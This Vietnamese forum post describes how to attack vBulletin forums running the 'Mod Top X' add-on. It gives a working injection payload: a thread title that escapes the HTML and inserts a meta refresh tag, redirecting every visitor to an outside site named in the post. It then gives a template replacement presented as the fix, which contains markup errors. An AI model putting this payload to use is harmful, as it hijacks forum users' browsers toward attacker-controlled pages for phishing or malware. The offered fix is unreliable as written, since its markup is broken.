Chỉ hack những forum có dùng Mod Top X
Post 1 bài có title như sau:
">"">>>><meta http-equiv="Refresh" content="0;url=http://hcaonline.mine.nu"> """" >
Như vậy nó sẽ direct sang hcaonline.mine.nu
Lưu ý: đừng khi link dài quá.
Còn đây là cách sửa lỗi của mấy bác VNISS
Admincp => Templates => Edit templates => topXstats_thread_bit
Thay tất cả bằng
Code:
<tr>
<td nowrap="nowrap"><div class="smallfont"><strong><if condition="$getstats_thread[newpost]">$newpostprefix<else />$oldpostprefix</if> <a href="showthread.php?$session[sessionurl]goto=newpost&t=$getstats_thread[threadid]">$getstats_thread[titletrimmed]</a></stong></div></td>
<if condition="$getstats_thread[isdeleted]">
<td colspan=3" align="left" nowrap="nowrap"><div class="smallfont"><phrase 1="member.php?$session[sessionurl]u=$getstats_thread[del_userid]" 2="$getstats_thread[del_username]">$vbphrase[thread_deleted_by_x]</phrase></div></td>
<else />
<td nowrap="nowrap"><div class="smallfont"><a href="member.php?$session[sessionurl]u=$getstats_thread[userid]">$getstats_thread[musername]</a></div></td>
<td align="right" nowrap="nowrap"><div class="smallfont">$getstats_thread[views]</div></td>
<td align="right" nowrap="nowrap"><div class="smallfont">$getstats_thread[replycount]</div></td>
</if>
</tr>